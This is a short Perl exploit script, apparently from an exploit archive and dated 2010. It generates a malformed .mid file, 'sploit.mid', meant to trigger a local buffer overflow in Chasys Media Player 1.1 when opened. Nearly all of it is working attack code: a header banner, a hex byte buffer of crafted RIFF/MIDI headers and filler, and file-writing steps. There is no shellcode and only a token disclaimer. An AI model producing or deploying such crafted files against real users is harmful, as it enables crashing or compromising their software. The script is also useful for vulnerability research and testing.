1 #!/usr/bin/perl
2
3 # Chasys Media Player 1.1 (.mid) Local Buffer Overflow
4 # Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
5 # From: Indonesia
6 #
7 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
8 # WARNING − WARNING − WARNING − WARNING
9 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
10 #
11 #
12 #
13 # Disclaimer: The author published the information under the condition
14 # that is not in the intention of the reader to use them in order to bring
15 # to himself or others a profit or to bring to others damage.
16 #
17 #
18 # Gr33tz: No Thanks
19
20
21 print "
22
[+]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−[+]
23
[+] Chasys Media Player 1.1 (.mid) Local Buffer Overflow [+]
24
[+] By : cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg> [+]
25
[+]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−[+]
26 ";
27
28
29 $buff =
30 "\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .
31 "\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .
32 "\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
33 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
34 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
35
36 open(file, "> sploit.mid");
37 print (file $buff);
38 print "\n\n[+] Done...!!!\n
39
[+] Open with Chasys Media Player\n
40
[+] Coded by cr4wl3r\n";
Page 1/1
Chasys Media Player v1.1 .mid Local Buffer Overflow
cr4wl3r
02/22/2010